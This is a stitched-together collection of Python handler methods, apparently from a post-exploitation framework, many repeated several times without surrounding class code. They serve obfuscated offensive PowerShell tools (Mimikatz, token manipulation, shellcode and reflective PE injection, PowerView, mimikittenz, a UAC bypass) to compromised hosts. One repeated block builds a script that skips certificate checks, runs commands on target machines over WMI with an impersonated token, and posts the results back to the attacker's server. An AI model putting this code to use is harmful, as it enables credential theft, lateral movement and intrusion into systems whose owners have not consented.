def on_request(self, context, request):
if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(
get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'),
'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
elif 'TokenRider.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
#Command to execute on the target system(s)
command_to_execute = 'cmd.exe /c {}'.format(self.command)
#context.log.debug(command_to_execute)
#This will get executed in the process that was created with the impersonated token
elevated_ps_command = '''
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
function Send-POSTRequest {{
[CmdletBinding()]
Param (
[string] $data
)
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
}}
$post_output = "";
$targets = @({targets});
foreach ($target in $targets){{
try{{
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
$post_output = $post_output + "Executed command on $target! `n";
}} catch {{
$post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
}}
}}
Send-POSTRequest $post_output'''.format(
server=context.server,
addr=context.localip,
port=context.server_port,
targets=self.target_computers,
command=command_to_execute)
request.wfile.write(elevated_ps_command)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Shellcode.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(
get_ps_script(
'Powersploit/CodeExecution/Invoke-Shellcode.ps1'),
'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
elif os.path.basename(self.shellcode_path) == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(self.shellcode_path, 'rb') as shellcode:
request.wfile.write(shellcode.read())
#Target has the shellcode, stop tracking the host
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
elif 'TokenRider.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
#Command to execute on the target system(s)
command_to_execute = 'cmd.exe /c {}'.format(self.command)
#context.log.debug(command_to_execute)
#This will get executed in the process that was created with the impersonated token
elevated_ps_command = '''
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
function Send-POSTRequest {{
[CmdletBinding()]
Param (
[string] $data
)
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
}}
$post_output = "";
$targets = @({targets});
foreach ($target in $targets){{
try{{
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
$post_output = $post_output + "Executed command on $target! `n";
}} catch {{
$post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
}}
}}
Send-POSTRequest $post_output'''.format(server=context.server,
addr=context.localip,
port=context.server_port,
targets=self.target_computers,
command=command_to_execute)
request.wfile.write(elevated_ps_command)
else:
request.send_response(404)
request.end_headers()
def payload(self, context, command):
'''
Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version,
update the base64 encoded binary in the Invoke-Mimikatz.ps1 script
and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.
Here we call the updated PowerShell script instead of PowerSploits version
'''
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
'''
Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version,
update the base64 encoded binary in the Invoke-Mimikatz.ps1 script
and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.
Here we call the updated PowerShell script instead of PowerSploits version
'''
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def on_request(self, context, request):
if 'PowerView.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('Recon/PowerView.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read())
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'PowerView.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read())
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-mimikittenz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Shellcode.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Shellcode.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'),
'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request, launcher, payload):
if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read())
request.wfile.write(ps_script)
elif 'TokenRider.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
#Command to execute on the target system(s)
request.wfile.write(payload)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
'''
Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version,
update the base64 encoded binary in the Invoke-Mimikatz.ps1 script
and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.
Here we call the updated PowerShell script instead of PowerSploits version
'''
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request, launcher, payload):
if "Invoke-TokenManipulation.ps1" == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script("PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1"), "r") as ps_script:
ps_script = obfs_ps_script(ps_script.read())
request.wfile.write(ps_script)
elif "TokenRider.ps1" == request.path[1:]:
request.send_response(200)
request.end_headers()
# Command to execute on the target system(s)
request.wfile.write(payload)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
'''
Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version,
update the base64 encoded binary in the Invoke-Mimikatz.ps1 script
and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.
Here we call the updated PowerShell script instead of PowerSploits version
'''
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
elif os.path.basename(self.payload_path) == request.path[1:]:
request.send_response(200)
request.end_headers()
request.stop_tracking_host()
with open(self.payload_path, 'rb') as payload:
request.wfile.write(payload.read())
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-Shellcode.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1') ,'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
elif os.path.basename(self.shellcode_path) == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(self.shellcode_path, 'rb') as shellcode:
request.wfile.write(shellcode.read())
#Target has the shellcode, stop tracking the host
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_request(self, context, request):
if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(
get_ps_script(
'CodeExecution/Invoke-ReflectivePEInjection.ps1'),
'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
elif os.path.basename(self.payload_path) == request.path[1:]:
request.send_response(200)
request.end_headers()
request.stop_tracking_host()
with open(self.payload_path, 'rb') as payload:
request.wfile.write(payload.read())
else:
request.send_response(404)
request.end_headers()
def payload(self, context, command):
with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(get_ps_script('Invoke-EventVwrBypass.ps1'), 'r') as ps_script:
return ps_script.read()
def payload(self, context, command):
with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'),
'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(
get_ps_script(
'PowerSploit/CodeExecution/Invoke-Shellcode.ps1'),
'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'),
'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(
get_ps_script(
'PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'),
'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(get_ps_script("mimikittenz/Invoke-mimikittenz.ps1"), "r") as ps_script:
return obfs_ps_script(ps_script.read())
def payload(self, context, command):
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())